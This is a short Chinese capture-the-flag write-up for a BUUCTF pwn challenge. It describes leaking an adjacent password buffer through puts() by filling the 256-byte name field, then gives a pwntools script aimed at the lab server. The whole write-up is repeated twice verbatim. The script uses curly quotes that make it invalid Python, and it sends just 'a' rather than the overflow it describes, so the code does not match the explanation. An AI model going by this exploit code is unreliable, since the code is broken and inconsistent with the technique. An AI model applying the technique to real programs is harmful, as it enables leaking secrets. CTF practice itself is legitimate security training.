这题难度不大,分析好流程就可以;
name,与密码 是紧挨着的,相差0x100,即256
我们可以利用puts() 进行溢出泄漏密码;
因为 puts() 函数输出遇到\x00停止;
from pwn import *
p = remote(“node3.buuoj.cn”,27388)
p.sendline(‘a’)
p.recv()
p.sendline(‘a_reAllY_s3cuRe_p4s$word_f85406’)
p.interactive()
这题难度不大,分析好流程就可以;
name,与密码 是紧挨着的,相差0x100,即256
我们可以利用puts() 进行溢出泄漏密码;
因为 puts() 函数输出遇到\x00停止;
from pwn import *
p = remote(“node3.buuoj.cn”,27388)
p.sendline(‘a’)
p.recv()
p.sendline(‘a_reAllY_s3cuRe_p4s$word_f85406’)
p.interactive()